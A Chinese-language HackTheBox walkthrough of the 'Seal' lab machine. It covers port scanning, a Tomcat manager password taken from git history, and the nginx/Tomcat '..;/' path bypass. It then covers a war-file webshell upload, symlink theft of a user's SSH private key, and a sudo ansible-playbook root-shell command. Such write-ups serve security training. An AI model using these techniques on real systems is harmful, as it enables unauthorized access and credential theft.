HackTheBox - Seal

本文最后更新于:2022年6月6日 下午

0x01 端口信息

使用nmap对靶机进行端口探测

1
nmap -sC -sV -v 10.10.10.22

结果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
PORT     STATE SERVICE    VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Issuer: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-05T10:24:03
| Not valid after: 2022-05-05T10:24:03
| MD5: 9c4f 991a bb97 192c df5a c513 057d 4d21
|_SHA-1: 0de4 6873 0ab7 3f90 c317 0f7b 872f 155b 305e 54ef
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Mon, 13 Dec 2021 01:34:13 GMT
| Set-Cookie: JSESSIONID=node0z5n4sbc9hnjors2ulsqy6jnq155.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Mon, 13 Dec 2021 01:34:08 GMT
| Set-Cookie: JSESSIONID=node09xtpsxy6z9pabh0g6yyqtajg153.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 13 Dec 2021 01:34:09 GMT
| Set-Cookie: JSESSIONID=node01nxswyk2xedhj14uol8ldn80oh154.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| Socks4:
| HTTP/1.1 400 Illegal character CNTL=0x4
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
| Socks5:
| HTTP/1.1 400 Illegal character CNTL=0x5
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=12/13%Time=61B6A310%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Mon,\x2013\x
SF:20Dec\x202021\x2001:34:08\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node09xtp
SF:sxy6z9pabh0g6yyqtajg153\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20T
SF:hu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/ht
SF:ml;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,10B,"H
SF:TTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2013\x20Dec\x202021\x2001:34:09
SF:\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node01nxswyk2xedhj14uol8ldn80oh154
SF:\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x20197
SF:0\x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAll
SF:ow:\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRe
SF:quest,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20te
SF:xt/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20c
SF:lose\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Ve
SF:rsion</pre>")%r(FourOhFourRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\
SF:r\nDate:\x20Mon,\x2013\x20Dec\x202021\x2001:34:13\x20GMT\r\nSet-Cookie:
SF:\x20JSESSIONID=node0z5n4sbc9hnjors2ulsqy6jnq155\.node0;\x20Path=/;\x20H
SF:ttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\n
SF:Content-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\
SF:n")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r
SF:\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x206
SF:9\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>rea
SF:son:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1
SF:\x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/ht
SF:ml;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\
SF:r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20charact
SF:er\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20ch
SF:aracter\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\
SF:r\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Mess
SF:age\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>
SF:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.32 seconds

0x02 user.txt

可以发现有两个WEB界面,分别如下。一个是gitbucket,另一个是一个商店一样的seal market:

image-20211213093829708

同时还能收集到一个邮箱(后面发现也没啥用):

image-20211213094036799

在gitbucket中能够看到一个seal的repo,查看其中tomcat配置文件tomcat-user.xml的git变更记录,发现存留的用户名和密码,记录一下:

image-20211213103229142

1
<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>

之后尝试使用该凭据信息进入tomcat控制台上传war包。首先是使用dirsearch扫一下目录:

image-20211213122223530

可以发现本该是控制台的/manager/html是403,访问该界面能够看到nginx的界面。不难推测是nginx是作为反向代理服务器,之后流量才转发给后端的tomcat。且nginx的location块应该作了相应的配置从而使得不能访问控制台。

image-20211213123304807

那就是需要想办法绕过了,其实现阶段爆出的很多漏洞中,反向代理在解析的时候和后端出现不一致的情况经常是会被拿来做文章的地方。据此搜索的话,最终我们能够找到一个目录穿越漏洞。

image-20211213123401130

第一个AWVS的链接中,我们可以发现一个存在不一致的情况。大体就是tomcat会将/..;/解析成传统意义上的/../,而nginx不会。所以nginx放过了本该拦截的URL访问,这样我们就能进入控制台了。

Web servers and reverse proxies normalize the request path. For example, the path /image/../image/ is normalized to /images/. When Apache Tomcat is used together with a reverse proxy such as nginx there is a nromalization inconsistency.

Tomcat will threat the sequence /..;/ as /../ and normalize the path while reverse proxies will not normalize this sequence and send it to Apache Tomcat as it is.

This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.

如上,我们访问如下链接就能进入tomcat的管理员界面:

1
https://10.10.10.250/manager/status/..;/html

image-20211213183540308

之后就是非常传统的通过上传war包getshell了,需要注意的是在上传时候访问的URL依旧需要抓包改包,否则依然会是403.

image-20211213184203717

这里传的是冰蝎马,经过测试平常默认使用的jsp冰蝎马会解析错误。

image-20211213195314377

换了一个低版本的java9的jsp webshell就行了。

image-20211213194049298

拿到shell后首先敲下命令看下权限,发现是非常普通的tomcat。

image-20211213195352058

0x03 root.txt

逛了一圈没有发现比较特殊的东西,ssh私钥也读不了。遂上传linpeas脚本后运行,发现网站的备份文件。

image-20211213201832397

在backup目录下发现playbook配置文件,可以发现有一个copy_link的敏感配置,这是我们可以利用的突破口。

image-20211213213033000

我们可以创建一个软连接,指向luis用户的ssh私钥,这样备份的时候就能复制出来了。

1
ln -s  /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa

用冰蝎将文件下载到本地,解压打开即可拿到用户luis的私钥。

image-20211213213332563

更改权限为600后登陆之,登陆成功后即可拿到user.txt。

image-20211213205338524

root的提权还是通过playbook。gtfobins中给出了通过playbook进行提权的脚本。当然也可以自己写一个。

image-20211213213533039

命令粘贴如下:

1
2
3
TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
sudo ansible-playbook $TF

运行后即可拿到root的shell,读root.txt即可。

image-20211213210347993

0x04 Summary

这是一个Medium难度的Linux靶机,主要考察内容如下:

  • tomcat路径穿越绕过
  • playbook应用滥用

HackTheBox - Seal
https://m0ck1ng-b1rd.github.io/2021/12/13/HTB/Seal/
作者
何语灵
发布于
2021年12月13日
许可协议